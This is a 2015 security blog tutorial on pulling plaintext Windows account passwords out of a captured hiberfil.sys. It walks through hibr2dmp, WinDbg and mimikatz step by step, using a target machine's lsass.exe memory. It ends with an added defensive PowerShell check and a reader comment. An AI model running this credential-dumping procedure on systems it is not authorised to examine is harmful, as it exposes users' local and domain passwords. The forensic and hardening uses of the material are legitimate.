
April 22, 2015 Security

How to Extract Windows User Passwords from Hiberfil.sys

Mimikatz, a tool that can extract Windows credentials from LSA in plain text, has been available since 2012. Besides its well-known feature of recovering passwords from the memory of a running OS, it has another interesting capability. Below are step-by-step instructions for extracting Windows user credentials from the hibernation file, hiberfil.sys.

Preparation

To follow these instructions you will need the following tools:

  1. Debugging Tools for Windows (WinDbg)
  2. Windows Memory toolkit free edition
  3. And mimikatz itself

Instructions

  1. Get hiberfil.sys from the target machine.
  2. Convert it into a format WinDbg can work with:

    hibr2dmp.exe d:\temp\hiberfil.sys c:\temp\hiberfil.dmp

    This can take a long time (in our example it took about 14 hours).
    hibr2dmp.exe - Convert hiberfil.sys to dmp format

  3. Run WinDbg and open the file you got in the previous step: File -> Open Crash Dump.
  4. Set the debug symbols. Open File -> Symbol File Path… and enter the following line:

    SRV*c:\symbols*http://msdl.microsoft.com/download/symbols

    WinDbg: set Symbol Search Path

    You can specify any other directory to which the symbols are to be downloaded instead of c:\symbols.

    Type the following in the debugger command prompt:

    0: kd> .reload /n

    Wait till the symbol download is completed:

    Debugging Tools for Windows : load kernel symbols

  5. Load mimilib.dll by its full path (it is located in the same directory as mimikatz):

    0: kd> .load z:\Sft\Security\Password\Mimikatz\x64\mimilib.dll

    WinDbg: load mimikatz dll (mimilib.dll)

  6. Find the address of the lsass.exe process:

    0: kd> !process 0 0 lsass.exe

    WinDbg: find lsass.exe process

    In our case the address is fffffa800a7d9060.

  7. Switch the process context:

    0: kd> .process /r /p fffffa800a7d9060

    Switch to process context in WinDbg

  8. Run mimikatz and obtain the plain text passwords:

    0: kd> !mimikatz

    Get plaintext Windows user passwords from hiberfil.sys

This way you can extract from the hibernation file the passwords of all local and domain accounts that had logon sessions on the system at the moment it hibernated.
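The practical consequence for an administrator is that any machine which hibernates leaves a copy of LSASS memory on disk. The following PowerShell check is an added example, not part of the original article or of mimikatz: it reports whether hibernation is enabled and whether hiberfil.sys is present on the system drive, and prints the `powercfg` command that turns hibernation off and removes the file. It assumes the `HibernateEnabled` value under `HKLM\SYSTEM\CurrentControlSet\Control\Power` is present on the Windows versions you manage, and that it is run from an elevated session.

```powershell
# Added example (not from the original article): report whether this host keeps
# a hibernation file on disk and show how to get rid of it.
# Assumption: HKLM\SYSTEM\CurrentControlSet\Control\Power\HibernateEnabled exists
# (DWORD, 1 = hibernation on). Run in an elevated PowerShell session.

$hiberfil = Join-Path $env:SystemDrive 'hiberfil.sys'
$powerKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Power'

# Read the hibernation flag; missing value is treated as "unknown", not "off".
$enabledValue = (Get-ItemProperty -Path $powerKey -Name HibernateEnabled `
                 -ErrorAction SilentlyContinue).HibernateEnabled

# hiberfil.sys is a hidden system file, so -Force is required for Get-Item to see it.
$file = Get-Item -Path $hiberfil -Force -ErrorAction SilentlyContinue

$report = [PSCustomObject]@{
    ComputerName     = $env:COMPUTERNAME
    HibernateEnabled = if ($null -eq $enabledValue) { 'unknown' } else { $enabledValue -eq 1 }
    HiberfilPresent  = ($null -ne $file)
    HiberfilSizeGB   = if ($file) { [math]::Round($file.Length / 1GB, 2) } else { 0 }
    HiberfilWritten  = if ($file) { $file.LastWriteTime } else { $null }
}
$report | Format-List

if ($report.HiberfilPresent -or $report.HibernateEnabled -eq $true) {
    Write-Host 'This host keeps a hibernation file that contains a copy of LSASS memory.'
    Write-Host 'On servers, VDI hosts and any machine that does not need hibernation, disable it with:'
    Write-Host '    powercfg /hibernate off'
    Write-Host 'This also deletes hiberfil.sys from the system drive.'
}
```

Two caveats worth keeping in mind when reading the report: the file stays on disk after the machine resumes, so `HiberfilWritten` tells you how old the captured memory image is, and on hosts where hibernation is genuinely needed (laptops), full-volume encryption of the system drive is what prevents the file from being read offline the way the article describes.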

1 comment

Keegoal August 13, 2015 - 1:50 pm

We’ve analyzed the hiberfil.sys file format of Windows 8, and will release a Decompressor a month later. Anybody who wants to join us or wants to own the Decompressor may mail us at flyingdreaming@bupt.edu.cn.
